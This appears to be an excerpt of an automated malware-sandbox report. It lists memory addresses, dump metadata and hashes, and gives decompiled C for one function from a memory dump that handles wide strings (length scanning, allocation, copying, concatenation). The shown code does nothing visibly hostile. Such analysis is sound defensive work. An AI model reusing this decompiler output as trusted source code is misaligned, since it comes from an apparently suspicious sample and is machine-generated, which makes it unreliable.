0x00000000
0x003bd191
0x00000000
0x003bd191
0x003bd150
0x003bd150
0x003bd154
0x003bd158
0x003bd15a
0x00000000
0x00000000
0x003bd160
0x003bd161
0x003bd166
0x00000000
0x00000000
0x00000000
0x003bd166
0x003bd8aa
0x00000000
0x003bd8aa
0x003bd8b3
0x003bd8ba
0x003bd8bd
0x00000000
0x003bd8bd
0x003bd0e2
0x003bd0e4
0x003bd0e8
0x003bd0ea
0x00000000
0x00000000
0x003bd0f1
0x003bd0f1
0x003bd0f3
0x003bd0f7
0x003bd0f9
0x00000000
0x00000000
0x003bd0ff
0x003bd100
0x003bd102
0x00000000
0x00000000
0x00000000
0x003bd104
0x003bd873
0x003bd877
0x00000000
0x003bd877
0x003bd05a
0x003bd061
0x003bd063
0x003bd06b
0x003bd06d
0x003bd070
0x003bd074
0x003bd0ae
0x003bd0b0
0x003bd0b3
0x003bd0b3
0x003bd0b5
0x00000000
0x003bd0b5
0x003bd078
0x003bd0a1
0x003bd0a1
0x003bd0a3
0x003bd0a4
0x003bd0a9
0x00000000
0x003bd0a9
0x003bd07a
0x003bd07d
0x003bd082
0x00000000
0x00000000
0x003bd084
0x003bd086
0x003bd086
0x003bd087
0x003bd08c
0x003bd093
0x00000000
0x00000000
0x003bd095
0x003bd099
0x003bd09f
0x00000000
0x00000000
0x00000000
0x003bd09f
0x00000000

Strings

@, xrefs: 003BD90E

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 752c5ff02bc24ceb70419a329ead1c3dab5549dfac1f6eefbc4f612475c4781f
Instruction ID: 80cd79399b5d5acf47a38db99d64c4b3d39a89d65168c60f74735ffdeacfe8aa
Opcode Fuzzy Hash: 752c5ff02bc24ceb70419a329ead1c3dab5549dfac1f6eefbc4f612475c4781f
Instruction Fuzzy Hash: 08425C75A0071287C7268F29C4412BA73E2BFD535CF29862DDA9A9BB95FB30DC41C781

Uniqueness

Uniqueness Score: -1.00%

Function 003C89F0, Relevance: 2.0, Strings: 1, Instructions: 748
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E003C89F0(intOrPtr* __ecx, signed int* _a4, signed int _a8) {
				unsigned int _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _t205;
				signed int* _t207;
				signed int _t211;
				unsigned int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t223;
				intOrPtr* _t224;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int _t242;
				signed int _t243;
				signed int _t248;
				signed int _t253;
				signed int _t258;
				signed int _t261;
				signed int _t262;
				unsigned int _t271;
				signed int _t277;
				void* _t278;
				signed int _t279;
				signed int _t280;
				short* _t283;
				signed int _t285;
				signed int _t286;
				intOrPtr* _t292;
				signed short* _t295;
				signed int* _t296;
				signed int _t298;
				signed int _t299;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				unsigned int _t309;
				signed int _t310;
				signed int _t313;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				void* _t322;
				signed int _t323;
				void* _t324;
				signed int _t325;
				signed int _t326;
				signed int _t329;
				signed int _t330;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				unsigned int _t341;
				signed int _t342;
				signed int _t344;
				signed int _t346;
				signed int _t350;
				intOrPtr _t352;
				intOrPtr* _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				void* _t358;
				signed int _t359;
				signed int _t360;
				signed int* _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t374;
				unsigned int _t381;
				signed int _t382;
				signed int _t384;
				intOrPtr* _t385;
				intOrPtr* _t386;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t401;
				unsigned int _t403;
				signed int _t404;
				signed short* _t405;
				signed int _t406;
				signed int _t407;
				signed int _t414;
				intOrPtr* _t419;
				signed int _t420;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				unsigned int _t431;
				signed int _t433;
				signed int _t439;
				signed int* _t441;
				signed int* _t442;
				signed int _t444;
				void* _t446;
				void* _t448;

				_push(_t298);
				_t446 = (_t444 & 0xfffffff0) - 0x24;
				_t419 = __ecx;
				_t352 =  *__ecx;
				if(_t352 != 0) {
					_t318 =  *( *( *(__ecx + 4)));
					__eflags = _t318;
					if(_t318 == 0) {
						L34:
						_push(0x80);
						_t299 = E003B1030();
						_t446 = _t446 + 4;
						__eflags =  *_t419 - 1;
						 *_t299 = 0;
						if( *_t419 <= 1) {
							goto L45;
						} else {
							_t374 = 0x40;
							goto L36;
						}
					} else {
						__eflags =  *_t318 & 0x0000ffff;
						if(( *_t318 & 0x0000ffff) == 0) {
							goto L34;
						} else {
							_t277 = _t318 & 0x0000000f;
							__eflags = _t277;
							if(_t277 == 0) {
								L16:
								asm("pxor xmm0, xmm0");
								_t414 =  ~( ~_t277 + 0x00000007 & 0x00000007) + 0x7fffffff;
								__eflags = _t414;
								while(1) {
									asm("movdqu xmm1, [ecx+eax*2]");
									asm("pcmpeqw xmm1, xmm0");
									asm("pmovmskb ebx, xmm1");
									__eflags = _t298;
									if(_t298 != 0) {
										break;
									}
									_t277 = _t277 + 8;
									__eflags = _t277 - _t414;
									if(_t277 < _t414) {
										continue;
									} else {
										__eflags = _t414 - 0x7fffffff;
										if(_t414 >= 0x7fffffff) {
											goto L22;
										} else {
											goto L20;
										}
									}
									goto L23;
								}
								asm("bsf edi, ebx");
								_t414 = (_t414 >> 1) + _t277;
							} else {
								_t414 = 0;
								__eflags = _t277 & 0x00000001;
								if((_t277 & 0x00000001) != 0) {
									while(1) {
										L20:
										__eflags =  *(_t318 + _t414 * 2) & 0x0000ffff;
										if(( *(_t318 + _t414 * 2) & 0x0000ffff) == 0) {
											goto L23;
										}
										_t414 = _t414 + 1;
										__eflags = _t414 - 0x7fffffff;
										if(_t414 < 0x7fffffff) {
											continue;
										} else {
											L22:
											_t414 = 0x7fffffff;
										}
										goto L23;
									}
								} else {
									_t277 =  ~_t277 + 0x10 >> 1;
									__eflags = _t277;
									while(1) {
										_t298 =  *(_t318 + _t414 * 2) & 0x0000ffff;
										__eflags = _t298;
										if(_t298 == 0) {
											goto L23;
										}
										_t414 = _t414 + 1;
										__eflags = _t414 - _t277;
										if(_t414 < _t277) {
											continue;
										} else {
											goto L16;
										}
										goto L23;
									}
								}
							}
							L23:
							_t23 = _t414 + 1; // 0x80000000
							_t278 = _t23;
							__eflags = _t278 - 0x40;
							_t279 =  <=  ? 0x40 : _t278;
							__eflags = _t279;
							if(_t279 > 0) {
								_t309 = (_t279 >> 5 >> 0x1a) + _t279 >> 6;
								_t280 = _t279 & 0x8000003f;
								__eflags = _t280;
								if(_t280 < 0) {
									_t280 = (_t280 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t280;
								}
								__eflags = _t280;
								_t310 = _t309 + (0 | _t280 > 0x00000000);
								_push(_t310 << 7);
								_v36 = _t310 << 6;
								_v52 = _t318;
								_t283 = E003B1030();
								_t350 = _v52;
								_t374 = _v36;
								_v48 = _t283;
								_t446 = _t446 + 4;
								_v40 = _t283;
								_v44 = 0;
								 *_t283 = 0;
								_v28 = _t419;
								_v52 =  *_t419;
								_t313 = _v44;
								_t441 = _v48;
								while(1) {
									_t285 =  *_t350 & 0x0000ffff;
									_t313 = _t313 + 1;
									 *_t441 = _t285;
									__eflags = _t414;
									if(_t414 == 0) {
										goto L32;
									}
									__eflags = _t313 - _t414;
									if(_t313 == _t414) {
										_v48 = _t441;
										__eflags = 0;
										_t299 = _v40;
										_t286 = _v52;
										_t419 = _v28;
										_t441[0] = 0;
									} else {
										goto L32;
									}
									L177:
									__eflags = _t286 - 1;
									if(_t286 > 1) {
										goto L36;
									} else {
										goto L178;
									}
									goto L89;
									L32:
									__eflags = _t285;
									if(_t285 == 0) {
										_t299 = _v40;
										_t286 = _v52;
										_t419 = _v28;
									} else {
										_t441 =  &(_t441[0]);
										_t350 = _t350 + 2;
										__eflags = _t350;
										continue;
									}
									goto L177;
								}
							} else {
								_t299 = 0;
								__eflags = _t352 - 1;
								if(_t352 <= 1) {
									L45:
									_t353 = _a4;
									 *_t353 = 0;
									 *((intOrPtr*)(_t353 + 4)) = 0;
									__eflags = _t299;
									if(_t299 == 0) {
										goto L80;
									} else {
										goto L46;
									}
								} else {
									_t374 = 0;
									L36:
									_t223 = _a8 & 0x0000ffff;
									_t403 = 1;
									_v36 = _t374;
									asm("pxor xmm0, xmm0");
									do {
										__eflags = _t223;
										if(_t223 == 0) {
											_v28 = _t419;
										} else {
											__eflags = _t299;
											if(_t299 == 0) {
												_v28 = _t419;
												L182:
												_t425 = 0;
											} else {
												_v28 = _t419;
												L151:
												_t248 = _t299 & 0x0000000f;
												__eflags = _t248;
												if(_t248 == 0) {
													L156:
													asm("pxor xmm1, xmm1");
													_t439 =  ~( ~_t248 + 0x00000007 & 0x00000007) + 0x7fffffff;
													__eflags = _t439;
													while(1) {
														asm("movdqu xmm0, [ebx+eax*2]");
														asm("pcmpeqw xmm0, xmm1");
														asm("pmovmskb edx, xmm0");
														__eflags = _t374;
														if(_t374 != 0) {
															break;
														}
														_t248 = _t248 + 8;
														__eflags = _t248 - _t439;
														if(_t248 < _t439) {
															continue;
														} else {
															__eflags = _t439 - 0x7fffffff;
															if(_t439 >= 0x7fffffff) {
																goto L162;
															} else {
																goto L160;
															}
														}
														goto L163;
													}
													asm("bsf esi, edx");
													_t425 = (_t439 >> 1) + _t248;
													goto L191;
												} else {
													_t439 = 0;
													__eflags = _t248 & 0x00000001;
													if((_t248 & 0x00000001) != 0) {
														while(1) {
															L160:
															__eflags =  *(_t299 + _t439 * 2) & 0x0000ffff;
															if(( *(_t299 + _t439 * 2) & 0x0000ffff) == 0) {
																goto L191;
															}
															_t439 = _t439 + 1;
															__eflags = _t439 - 0x7fffffff;
															if(_t439 < 0x7fffffff) {
																continue;
															} else {
																L162:
																_t425 = 0x7fffffff;
															}
															goto L163;
														}
														goto L191;
													} else {
														_t248 =  ~_t248 + 0x10 >> 1;
														__eflags = _t248;
														while(1) {
															_t374 =  *(_t299 + _t439 * 2) & 0x0000ffff;
															__eflags = _t374;
															if(_t374 == 0) {
																break;
															}
															_t439 = _t439 + 1;
															__eflags = _t439 - _t248;
															if(_t439 < _t248) {
																continue;
															} else {
																goto L156;
															}
															goto L163;
														}
														L191:
														__eflags = _t425 - 0xfffffffe;
														if(_t425 == 0xfffffffe) {
															 *_t299 = 0;
														}
													}
												}
											}
											L163:
											_t158 = _t425 + 2; // -2147483652
											_t324 = _t158;
											__eflags = _t324 - 0x40;
											_t325 =  <=  ? 0x40 : _t324;
											__eflags = _t325 - _v36;
											if(_t325 > _v36) {
												_t381 = (_t325 >> 5 >> 0x1a) + _t325 >> 6;
												_t326 = _t325 & 0x8000003f;
												__eflags = _t326;
												if(_t326 < 0) {
													_t326 = (_t326 - 0x00000001 | 0xffffffc0) + 1;
													__eflags = _t326;
												}
												__eflags = _t326;
												_t382 = _t381 + (0 | _t326 > 0x00000000);
												_v36 = _t382 << 6;
												_push(_t382 << 7);
												_t384 = E003B1030();
												_t446 = _t446 + 4;
												__eflags = _t299;
												if(_t299 == 0) {
													__eflags = 0;
													 *_t384 = 0;
												} else {
													__eflags = _t384;
													if(_t384 != 0) {
														_t242 =  *_t299 & 0x0000ffff;
														 *_t384 = _t242;
														__eflags = _t242;
														if(_t242 != 0) {
															_t243 = 0;
															__eflags = 0;
															while(1) {
																_t243 = _t243 + 1;
																_t329 =  *(_t299 + _t243 * 4 - 2) & 0x0000ffff;
																 *(_t384 + _t243 * 4 - 2) = _t329;
																__eflags = _t329;
																if(_t329 == 0) {
																	goto L172;
																}
																_t330 =  *(_t299 + _t243 * 4) & 0x0000ffff;
																 *(_t384 + _t243 * 4) = _t330;
																__eflags = _t330;
																if(_t330 != 0) {
																	continue;
																}
																goto L172;
															}
														}
													}
													L172:
													_push(2);
													_push(_t299);
													_v48 = _t384;
													E003B10B0();
													_t384 = _v48;
													_t446 = _t446 + 8;
												}
												_t299 = _t384;
											}
											 *((short*)(_t299 + _t425 * 2)) = _a8 & 0x0000ffff;
											 *((short*)(_t299 + 2 + _t425 * 2)) = 0;
											while(1) {
												L41:
												_t224 = _v28;
												_t323 =  *( *((intOrPtr*)(_t224 + 4)) + _t403 * 4);
												_t374 =  *_t323;
												__eflags = _t374;
												if(_t374 == 0) {
													break;
												}
												__eflags =  *_t374 & 0x0000ffff;
												if(( *_t374 & 0x0000ffff) != 0) {
													__eflags = _t374 - _t299;
													if(_t374 == _t299) {
														goto L43;
													} else {
														_t227 = _t374 & 0x0000000f;
														__eflags = _t227;
														if(_t227 == 0) {
															L96:
															asm("pxor xmm1, xmm1");
															_t431 =  ~( ~_t227 + 0x00000007 & 0x00000007) + 0x7fffffff;
															__eflags = _t431;
															while(1) {
																asm("movdqu xmm0, [edx+eax*2]");
																asm("pcmpeqw xmm0, xmm1");
																asm("pmovmskb ecx, xmm0");
																__eflags = _t323;
																if(_t323 != 0) {
																	break;
																}
																_t227 = _t227 + 8;
																__eflags = _t227 - _t431;
																if(_t227 < _t431) {
																	continue;
																} else {
																	__eflags = _t431 - 0x7fffffff;
																	if(_t431 >= 0x7fffffff) {
																		goto L102;
																	} else {
																		goto L100;
																	}
																}
																goto L103;
															}
															asm("bsf esi, ecx");
															_t433 = (_t431 >> 1) + _t227;
														} else {
															_t433 = 0;
															__eflags = _t227 & 0x00000001;
															if((_t227 & 0x00000001) != 0) {
																while(1) {
																	L100:
																	__eflags =  *(_t374 + _t433 * 2) & 0x0000ffff;
																	if(( *(_t374 + _t433 * 2) & 0x0000ffff) == 0) {
																		goto L103;
																	}
																	_t433 = _t433 + 1;
																	__eflags = _t433 - 0x7fffffff;
																	if(_t433 < 0x7fffffff) {
																		continue;
																	} else {
																		L102:
																		_t433 = 0x7fffffff;
																	}
																	goto L103;
																}
															} else {
																_t227 =  ~_t227 + 0x10 >> 1;
																__eflags = _t227;
																while(1) {
																	_t323 =  *(_t374 + _t433 * 2) & 0x0000ffff;
																	__eflags = _t323;
																	if(_t323 == 0) {
																		goto L103;
																	}
																	_t433 = _t433 + 1;
																	__eflags = _t433 - _t227;
																	if(_t433 < _t227) {
																		continue;
																	} else {
																		goto L96;
																	}
																	goto L103;
																}
															}
														}
														L103:
														__eflags = _t299;
														if(_t299 == 0) {
															_t228 = 0;
														} else {
															_t346 = _t299 & 0x0000000f;
															__eflags = _t346;
															if(_t346 == 0) {
																L110:
																asm("pxor xmm1, xmm1");
																_v24 = _t403;
																_t228 =  ~( ~_t346 + 0x00000007 & 0x00000007) + 0x7fffffff;
																__eflags = _t228;
																while(1) {
																	asm("movdqu xmm0, [ebx+ecx*2]");
																	asm("pcmpeqw xmm0, xmm1");
																	asm("pmovmskb edi, xmm0");
																	__eflags = _t403;
																	if(_t403 != 0) {
																		break;
																	}
																	_t346 = _t346 + 8;
																	__eflags = _t346 - _t228;
																	if(_t346 < _t228) {
																		continue;
																	} else {
																		_t403 = _v24;
																		__eflags = _t228 - 0x7fffffff;
																		if(_t228 >= 0x7fffffff) {
																			goto L116;
																		} else {
																			goto L114;
																		}
																	}
																	goto L117;
																}
																asm("bsf eax, eax");
																_t271 = _t403 >> 1;
																_t403 = _v24;
																_t228 = _t271 + _t346;
															} else {
																_t228 = 0;
																__eflags = _t346 & 0x00000001;
																if((_t346 & 0x00000001) != 0) {
																	while(1) {
																		L114:
																		__eflags =  *(_t299 + _t228 * 2) & 0x0000ffff;
																		if(( *(_t299 + _t228 * 2) & 0x0000ffff) == 0) {
																			goto L117;
																		}
																		_t228 = _t228 + 1;
																		__eflags = _t228 - 0x7fffffff;
																		if(_t228 < 0x7fffffff) {
																			continue;
																		} else {
																			L116:
																			_t228 = 0x7fffffff;
																		}
																		goto L117;
																	}
																} else {
																	_t346 =  ~_t346 + 0x10 >> 1;
																	__eflags = _t346;
																	_v24 = _t403;
																	while(1) {
																		__eflags =  *(_t299 + _t228 * 2) & 0x0000ffff;
																		if(( *(_t299 + _t228 * 2) & 0x0000ffff) == 0) {
																			break;
																		}
																		_t228 = _t228 + 1;
																		__eflags = _t228 - _t346;
																		if(_t228 < _t346) {
																			continue;
																		} else {
																			_t403 = _v24;
																			goto L110;
																		}
																		goto L117;
																	}
																	_t403 = _v24;
																}
															}
														}
														L117:
														_t105 = _t228 + 1; // 0x80000000
														_t229 = _t433 + _t105;
														__eflags = _t229;
														if(_t229 != 0) {
															__eflags = _t229 - 0x40;
															_t230 =  <=  ? 0x40 : _t229;
															__eflags = _t230 - _v36;
															if(_t230 > _v36) {
																goto L123;
															}
															goto L135;
														} else {
															__eflags = _t299;
															if(_t299 == 0) {
																__eflags = _v36 - 0x40;
																if(_v36 < 0x40) {
																	goto L121;
																} else {
																	goto L187;
																}
															} else {
																_t334 = 0;
																 *_t299 = 0;
																__eflags = _v36 - 0x40;
																if(_v36 < 0x40) {
																	L121:
																	_t230 = 0x40;
																	L123:
																	_t341 = (_t230 >> 5 >> 0x1a) + _t230 >> 6;
																	_t253 = _t230 & 0x8000003f;
																	__eflags = _t253;
																	if(_t253 < 0) {
																		_t253 = (_t253 - 0x00000001 | 0xffffffc0) + 1;
																		__eflags = _t253;
																	}
																	__eflags = _t253;
																	_t342 = _t341 + (0 | _t253 > 0x00000000);
																	_v36 = _t342 << 6;
																	_push(_t342 << 7);
																	_v32 = _t374;
																	_t258 = E003B1030();
																	_t374 = _v32;
																	_t344 = _t258;
																	_t446 = _t446 + 4;
																	__eflags = _t299;
																	if(_t299 == 0) {
																		__eflags = 0;
																		 *_t344 = 0;
																	} else {
																		__eflags = _t344;
																		if(_t344 != 0) {
																			_t261 =  *_t299 & 0x0000ffff;
																			 *_t344 = _t261;
																			__eflags = _t261;
																			if(_t261 != 0) {
																				_v24 = _t403;
																				_t262 = 0;
																				__eflags = 0;
																				while(1) {
																					_t262 = _t262 + 1;
																					_t406 =  *(_t299 + _t262 * 4 - 2) & 0x0000ffff;
																					 *(_t344 + _t262 * 4 - 2) = _t406;
																					__eflags = _t406;
																					if(_t406 == 0) {
																						break;
																					}
																					_t407 =  *(_t299 + _t262 * 4) & 0x0000ffff;
																					 *(_t344 + _t262 * 4) = _t407;
																					__eflags = _t407;
																					if(_t407 != 0) {
																						continue;
																					}
																					break;
																				}
																				_t403 = _v24;
																			}
																		}
																		_push(2);
																		_push(_t299);
																		_v52 = _t344;
																		_v32 = _t374;
																		E003B10B0();
																		_t374 = _v32;
																		_t344 = _v52;
																		_t446 = _t446 + 8;
																	}
																	_t299 = _t344;
																	L135:
																	_t231 = _t299;
																	__eflags = _t299;
																	if(_t299 == 0) {
																		L187:
																		_t403 = _t403 + 1;
																		__eflags = _t403 -  *_v28;
																		if(_t403 >=  *_v28) {
																			_t385 = _a4;
																			 *_t385 = 0;
																			 *((intOrPtr*)(_t385 + 4)) = 0;
																			goto L80;
																		} else {
																			__eflags = _a8 & 0x0000ffff;
																			if((_a8 & 0x0000ffff) != 0) {
																				goto L182;
																			} else {
																				continue;
																			}
																			goto L198;
																		}
																	} else {
																		_t334 =  *_t299 & 0x0000ffff;
																		goto L137;
																	}
																} else {
																	_t231 = _t299;
																	L137:
																	__eflags = _t334;
																	if(_t334 != 0) {
																		_v32 = _t374;
																		_t336 = 0;
																		__eflags = 0;
																		_v24 = _t403;
																		while(1) {
																			_t336 = _t336 + 1;
																			_t405 = _t299 + _t336 * 4;
																			_t231 = _t405 - 2;
																			__eflags =  *(_t405 - 2) & 0x0000ffff;
																			if(( *(_t405 - 2) & 0x0000ffff) == 0) {
																				break;
																			}
																			_t231 = _t405;
																			__eflags =  *_t405 & 0x0000ffff;
																			if(( *_t405 & 0x0000ffff) != 0) {
																				continue;
																			}
																			break;
																		}
																		_t374 = _v32;
																		_t403 = _v24;
																	}
																	_t335 = _t231;
																	__eflags = _t433;
																	if(__eflags != 0) {
																		if(__eflags > 0) {
																			goto L145;
																		}
																	} else {
																		_t433 = 0x7fffffff;
																		L145:
																		_v44 = 0;
																		_v24 = _t403;
																		_v40 = _t299;
																		_t404 = _v44;
																		while(1) {
																			_t303 =  *(_t374 + _t404 * 2) & 0x0000ffff;
																			 *(_t335 + _t404 * 2) = _t303;
																			__eflags = _t303;
																			if(_t303 == 0) {
																				break;
																			}
																			_t146 = _t404 * 2; // 0x2
																			_t231 = _t335 + _t146 + 2;
																			_t404 = _t404 + 1;
																			__eflags = _t404 - _t433;
																			if(_t404 < _t433) {
																				continue;
																			}
																			break;
																		}
																		_t403 = _v24;
																		_t299 = _v40;
																	}
																	_t374 = 0;
																	_t403 = _t403 + 1;
																	 *_t231 = 0;
																	__eflags = _t403 -  *_v28;
																	if(_t403 >=  *_v28) {
																		L178:
																		_t386 = _a4;
																		 *_t386 = 0;
																		 *((intOrPtr*)(_t386 + 4)) = 0;
																		L46:
																		_t211 =  *_t299 & 0x0000ffff;
																		__eflags = _t211;
																		if(_t211 == 0) {
																			L80:
																			_push(0x80);
																			_t420 = E003B1030();
																			_t446 = _t446 + 4;
																			_t205 =  *_a4;
																			__eflags = _t205;
																			if(_t205 == 0) {
																				__eflags = 0;
																				 *_t420 = 0;
																			} else {
																				__eflags = _t420;
																				if(_t420 != 0) {
																					_t354 =  *_t205 & 0x0000ffff;
																					 *_t420 = _t354;
																					__eflags = _t354;
																					if(_t354 != 0) {
																						_t355 = 0;
																						__eflags = 0;
																						while(1) {
																							_t355 = _t355 + 1;
																							_t319 =  *(_t205 + _t355 * 4 - 2) & 0x0000ffff;
																							 *(_t420 + _t355 * 4 - 2) = _t319;
																							__eflags = _t319;
																							if(_t319 == 0) {
																								goto L86;
																							}
																							_t320 =  *(_t205 + _t355 * 4) & 0x0000ffff;
																							 *(_t420 + _t355 * 4) = _t320;
																							__eflags = _t320;
																							if(_t320 != 0) {
																								continue;
																							}
																							goto L86;
																						}
																					}
																				}
																				L86:
																				_push(2);
																				_push(_t205);
																				E003B10B0();
																				_t446 = _t446 + 8;
																			}
																			_t207 = _a4;
																			 *_t207 = _t420;
																			_t207[1] = 0x40;
																		} else {
																			_t357 = _t299 & 0x0000000f;
																			__eflags = _t357;
																			if(_t357 == 0) {
																				L52:
																				asm("pxor xmm0, xmm0");
																				_t401 =  ~( ~_t357 + 0x00000007 & 0x00000007) + 0x7fffffff;
																				__eflags = _t401;
																				while(1) {
																					asm("movdqu xmm1, [ebx+edx*2]");
																					asm("pcmpeqw xmm1, xmm0");
																					asm("pmovmskb eax, xmm1");
																					__eflags = _t211;
																					if(_t211 != 0) {
																						break;
																					}
																					_t357 = _t357 + 8;
																					__eflags = _t357 - _t401;
																					if(_t357 < _t401) {
																						continue;
																					} else {
																						__eflags = _t401 - 0x7fffffff;
																						if(_t401 >= 0x7fffffff) {
																							goto L58;
																						} else {
																							goto L56;
																						}
																					}
																					goto L59;
																				}
																				asm("bsf edi, eax");
																				_t401 = (_t401 >> 1) + _t357;
																			} else {
																				_t401 = 0;
																				__eflags = _t357 & 0x00000001;
																				if((_t357 & 0x00000001) != 0) {
																					while(1) {
																						L56:
																						__eflags =  *(_t299 + _t401 * 2) & 0x0000ffff;
																						if(( *(_t299 + _t401 * 2) & 0x0000ffff) == 0) {
																							goto L59;
																						}
																						_t401 = _t401 + 1;
																						__eflags = _t401 - 0x7fffffff;
																						if(_t401 < 0x7fffffff) {
																							continue;
																						} else {
																							L58:
																							_t401 = 0x7fffffff;
																						}
																						goto L59;
																					}
																				} else {
																					_t357 =  ~_t357 + 0x10 >> 1;
																					__eflags = _t357;
																					while(1) {
																						_t211 =  *(_t299 + _t401 * 2) & 0x0000ffff;
																						__eflags = _t211;
																						if(_t211 == 0) {
																							goto L59;
																						}
																						_t401 = _t401 + 1;
																						__eflags = _t401 - _t357;
																						if(_t401 < _t357) {
																							continue;
																						} else {
																							goto L52;
																						}
																						goto L59;
																					}
																				}
																			}
																			L59:
																			_t54 = _t401 + 1; // 0x80000000
																			_t358 = _t54;
																			__eflags = _t358 - 0x40;
																			_t359 =  <=  ? 0x40 : _t358;
																			__eflags = _t359;
																			if(_t359 > 0) {
																				_t217 = (_t359 >> 5 >> 0x1a) + _t359 >> 6;
																				_t360 = _t359 & 0x8000003f;
																				__eflags = _t360;
																				if(_t360 < 0) {
																					_t360 = (_t360 - 0x00000001 | 0xffffffc0) + 1;
																					__eflags = _t360;
																				}
																				__eflags = _t360;
																				_t218 = _t217 + (0 | _t360 > 0x00000000);
																				_push(_t218 << 7);
																				_t423 = _t218 << 6;
																				_t220 = E003B1030();
																				_t446 = _t446 + 4;
																				_t321 =  *_a4;
																				__eflags = _t321;
																				if(_t321 == 0) {
																					__eflags = 0;
																					 *_t220 = 0;
																				} else {
																					__eflags = _t220;
																					if(_t220 != 0) {
																						_t368 =  *_t321 & 0x0000ffff;
																						 *_t220 = _t368;
																						__eflags = _t368;
																						if(_t368 != 0) {
																							_v40 = _t299;
																							_t369 = 0;
																							__eflags = 0;
																							while(1) {
																								_t369 = _t369 + 1;
																								_t301 =  *(_t321 + _t369 * 4 - 2) & 0x0000ffff;
																								 *(_t220 + _t369 * 4 - 2) = _t301;
																								__eflags = _t301;
																								if(_t301 == 0) {
																									break;
																								}
																								_t302 =  *(_t321 + _t369 * 4) & 0x0000ffff;
																								 *(_t220 + _t369 * 4) = _t302;
																								__eflags = _t302;
																								if(_t302 != 0) {
																									continue;
																								}
																								break;
																							}
																							_t299 = _v40;
																						}
																					}
																					_push(2);
																					_push(_t321);
																					_v52 = _t220;
																					E003B10B0();
																					_t220 = _v52;
																					_t446 = _t446 + 8;
																				}
																				_t365 = _a4;
																				_t365[1] = _t423;
																				 *_t365 = _t220;
																			} else {
																				_t220 = 0;
																			}
																			_t366 = _t299;
																			__eflags = _t220;
																			if(_t220 != 0) {
																				_t322 = 0;
																				while(1) {
																					_t424 =  *_t366 & 0x0000ffff;
																					_t322 = _t322 + 1;
																					 *_t220 = _t424;
																					__eflags = _t401;
																					if(_t401 == 0) {
																						goto L78;
																					}
																					__eflags = _t322 - _t401;
																					if(_t322 == _t401) {
																						 *(_t220 + 2) = 0;
																					} else {
																						goto L78;
																					}
																					goto L89;
																					L78:
																					__eflags = _t424;
																					if(_t424 != 0) {
																						_t220 = _t220 + 2;
																						_t366 = _t366 + 2;
																						__eflags = _t366;
																						continue;
																					}
																					goto L89;
																				}
																			}
																		}
																	} else {
																		__eflags = _a8 & 0x0000ffff;
																		if((_a8 & 0x0000ffff) == 0) {
																			continue;
																		} else {
																			goto L151;
																		}
																		goto L198;
																	}
																}
															}
														}
													}
												} else {
													L43:
													_t223 = _a8 & 0x0000ffff;
													_t419 = _v28;
													goto L44;
												}
												goto L89;
											}
											_t419 = _t224;
											_t223 = _a8 & 0x0000ffff;
											goto L44;
										}
										goto L41;
										L44:
										_t403 = _t403 + 1;
										__eflags = _t403 -  *_t419;
									} while (_t403 <  *_t419);
									goto L45;
								}
							}
						}
					}
					L89:
					_push(2);
					_push(_t299);
					E003B10B0();
					return _a4;
				} else {
					_t292 = _a4;
					_t314 = 0;
					_push(0x80);
					 *_t292 = 0;
					 *((intOrPtr*)(_t292 + 4)) = 0;
					_t442 = E003B1030();
					_t448 = _t446 + 4;
					_t295 =  *_a4;
					if(_t295 == 0) {
						 *_t442 = 0;
					} else {
						if(_t442 != 0) {
							_t391 =  *_t295 & 0x0000ffff;
							 *_t442 = _t391;
							if(_t391 != 0) {
								while(1) {
									_t314 = _t314 + 1;
									_t392 =  *(_t295 + _t314 * 4 - 2) & 0x0000ffff;
									 *(_t442 + _t314 * 4 - 2) = _t392;
									if(_t392 == 0) {
										goto L6;
									}
									_t393 =  *(_t295 + _t314 * 4) & 0x0000ffff;
									_t442[_t314] = _t393;
									if(_t393 != 0) {
										continue;
									}
									goto L6;
								}
							}
						}
						L6:
						_push(2);
						_push(_t295);
						E003B10B0();
						_t448 = _t448 + 8;
					}
					_t296 = _a4;
					_t296[1] = 0x40;
					 *_t296 = _t442;
					return _t296;
				}
				L198:
			}

0x003c89f8
0x003c89f9
0x003c89fc
0x003c89fe
0x003c8a02
0x003c8a7c
0x003c8a7e
0x003c8a80
0x003c8bb5
0x003c8bb5
0x003c8bbf
0x003c8bc1
0x003c8bc6
0x003c8bc9
0x003c8bcc
0x00000000
0x003c8bce
0x003c8bce
0x00000000
0x003c8bce
0x003c8a86
0x003c8a89
0x003c8a8b
0x00000000
0x003c8a91
0x003c8a93
0x003c8a93
0x003c8a96
0x003c8ab2
0x003c8ab6
0x003c8ac2
0x003c8ac2
0x003c8ac8
0x003c8ac8
0x003c8acd
0x003c8ad1
0x003c8ad5
0x003c8ad7
0x00000000
0x00000000
0x003c8add
0x003c8ae0
0x003c8ae2
0x00000000
0x003c8ae4
0x003c8ae4
0x003c8aea
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8aea
0x00000000
0x003c8ae2
0x003c91f2
0x003c91f7
0x003c8a98
0x003c8a98
0x003c8a9a
0x003c8a9c
0x003c8aec
0x003c8aec
0x003c8af0
0x003c8af2
0x00000000
0x00000000
0x003c8af4
0x003c8af5
0x003c8afb
0x00000000
0x003c8afd
0x003c8afd
0x003c8afd
0x003c8afd
0x00000000
0x003c8afb
0x003c8a9e
0x003c8aa3
0x003c8aa3
0x003c8aa5
0x003c8aa5
0x003c8aa9
0x003c8aab
0x00000000
0x00000000
0x003c8aad
0x003c8aae
0x003c8ab0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c8ab0
0x003c8aa5
0x003c8a9c
0x003c8b02
0x003c8b07
0x003c8b07
